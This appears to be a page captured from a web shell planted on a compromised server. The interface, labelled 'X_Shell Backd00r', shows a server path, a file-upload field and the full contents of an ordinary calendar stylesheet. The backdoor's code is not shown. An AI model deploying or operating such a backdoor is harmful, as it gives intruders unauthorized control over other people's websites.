[#] hm X_Shell Backd00r [#]

Current Path : /var/www/clients/client35/web46/web/css/
Upload File :
Current File : /var/www/clients/client35/web46/web/css/calendar.css

#cal{ position: relative !important;}
#cover-calendar{
	position: absolute;
	width: 100%;
	height: 100%;
	background-color: #ffffff;
	background-repeat: no-repeat;
	background-position: center center;
	background-size: contain;
	top:0;
	left: 0;
	z-index: 1;
  	border: 1px solid #B82015;
	display: none;
} #cover-calendar img{ 
		width: 214px;
		height: 68px;
		top:50%;
		left: 50%;
		margin: -34px 0 0 -107px;
		position: absolute;
	}

	#cover-calendar .close{
		background: url('../img/sprite.png') 2px 1px no-repeat;
		cursor: pointer;
		height: 30px;
		width: 30px;
		position: absolute;
		right: 5px;
		top: 5px;
	} #cover-calendar .close:hover{ opacity: .7;}

	#cover-calendar .nota-modal{
		position: absolute;
		bottom: 0;
		padding: 10px;
		font-size: 14px;
		background-color: #B82015;
		color: #FFF;
	}

table.table-calendar{
    border-collapse: collapse;
    border-spacing: 0;
	width:100%;
	min-height:170px;
	margin:0px;padding:0px;
	margin-bottom: 10px;
} 
table.table-calendar td a{ cursor: pointer;}

table.table-calendar td{
	vertical-align:middle;
	background-color:#F5F5F5;
	border:1px solid #D6DADF;
	padding:7px 5px;
	font-size:12px;
	font-family:Arial;
	font-weight:normal;
	color:#999999;
	text-align: center;
	position: relative;
}

table.table-calendar td.calendar-day-np{ background-color: #DFDFDF;}

table.table-calendar thead tr:first-child td{
	background-color:#ffffff;
	text-align:center;
	font-size:12px;
	font-family: 'HelveticaNeueRegular';
	font-weight:normal;
	color:#EF6A6A;
}

thead td span.title-mes{}

div.active{
	color: #FFF;
	cursor: pointer;
	background-image: url('../img/estrellita.png');
	background-position: center center;
	background-repeat: no-repeat;
	background-color: #EF6A6A;
	background-size: 90%;
	position: absolute;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
} div.active:hover{ background-color: #FA4646;}


Mr.hm X_Shell Backd00r 1.0, Coded By Mr.hm X_Shell Backd00r